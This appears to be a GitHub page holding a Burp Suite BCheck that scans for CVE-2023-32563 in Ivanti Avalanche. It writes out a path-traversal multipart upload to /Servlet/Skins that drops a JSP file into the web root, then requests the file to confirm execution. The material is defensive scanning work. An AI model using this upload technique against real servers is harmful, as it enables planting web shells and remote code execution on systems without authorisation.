-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2023-32563 - Ivanti Avalanche - RCE.bcheck
57 lines (45 loc) · 1.52 KB
/
CVE-2023-32563 - Ivanti Avalanche - RCE.bcheck
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
# https://twitter.com/wvuuuuuuuuuuuuu/status/1694956245742923939
metadata:
language: v2-beta
name: "CVE-2023-32563 - Ivanti Avalanche - RCE"
description: "Checks for CVE-2023-32563"
author: "DemonGod"
tags: "Ivanti", "SSTI", "RCE"
define:
test_file = {random_str(17)}
test_nonce = {random_str(20)}
given host then
send request called check_1:
`POST /Servlet/Skins HTTP/1.1
Host: {base.request.url.host}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: {user_agent}
Content-Length: 333
Content-Type: multipart/form-data; boundary=------------------------92afcaa4bcd3c990
Connection: close
--------------------------92afcaa4bcd3c990
Content-Disposition: form-data; name="guid"
../../../Web/webapps/ROOT
--------------------------92afcaa4bcd3c990
Content-Disposition: form-data; name="file"; filename="{test_file}.jsp"
<%
out.println("{test_nonce}");
%>
--------------------------92afcaa4bcd3c990--`
send request called check_2:
`GET /{test_file}.jsp HTTP/1.1
Host: {base.request.url.host}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: {user_agent}
Connection: close
`
if {test_nonce} in {check_2.response.body} then
report issue:
severity: high
confidence: tentative
detail: "Ivanti Avalanche - Remote Code Execution."
end if